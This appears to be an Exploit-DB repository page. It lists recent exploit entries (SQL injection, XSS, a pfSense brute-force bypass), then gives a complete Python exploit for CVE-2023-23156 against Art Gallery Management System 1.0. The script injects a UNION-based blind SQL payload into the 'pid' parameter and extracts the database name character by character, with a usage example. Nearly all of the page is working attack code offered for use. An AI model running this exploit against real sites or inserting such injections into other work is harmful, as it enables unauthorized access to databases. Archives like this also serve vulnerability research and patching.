
9 changes to exploits/shellcodes/ghdb pfsenseCE v2.6.0 - Anti-brute force protection bypass Art Gallery Management System Project in PHP v 1.0 - SQL injection Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS) Art Gallery Management System Project v1.0 - SQL Injection (sqli) authenticated Art Gallery Management System Project v1.0 - SQL Injection (sqli) Unauthenticated Art Gallery Management System Project in PHP v 1.0 - SQL injection Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS) Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated Bang Resto v1.0 - 'Multiple' SQL Injection Bang Resto v1.0 - Stored Cross-Site Scripting (XSS) Bang Resto v1.0 - 'Multiple' SQL Injection Bang Resto v1.0 - Stored Cross-Site Scripting (XSS) pfsenseCE v2.6.0 - Anti-brute force protection bypass
37 lines
No EOL
1.3 KiB
Python
Executable file
37 lines
No EOL
1.3 KiB
Python
Executable file
# Exploit Title: Art Gallery Management System Project in PHP v 1.0 - SQL injection
|
|
# Date: 31-01-2023
|
|
# Exploit Author: Yogesh Verma
|
|
# Vendor Homepage: https://y0gesh-verma.github.io/
|
|
# Software Link: https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/, https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
|
|
# Version: 1.0
|
|
# Tested on: Windows/Linux
|
|
# CVE : CVE-2023-23156
|
|
|
|
|
|
|
|
#!/usr/bin/python
|
|
import sys
|
|
import requests
|
|
|
|
tmp = requests.Session()
|
|
db_name = ""
|
|
database = ""
|
|
if len(sys.argv) == 2:
|
|
url = sys.argv[1]
|
|
for i in range(1, 7):
|
|
for j in range(32, 126):
|
|
sql_payload = f"'UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,(select*from(select (ascii(substr(database(),{i},1))={j}))a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL'"
|
|
data = {'pid': '-1' + sql_payload}
|
|
r = tmp.get(url, params=data)
|
|
if "Dimension : 1" in r.text:
|
|
db_name += chr(j)
|
|
database += db_name
|
|
if len(db_name)>1:
|
|
print('\n'+"Fetching current database :")
|
|
print(database)
|
|
print('\n'+"vulnerable to CVE-2023-23156")
|
|
else:
|
|
print("Not vulnerable to CVE-2023-23156")
|
|
else:
|
|
print("Error: Please provide the URL as an argument.")
|
|
print("Example: script.py https://example.com/single-product.php") |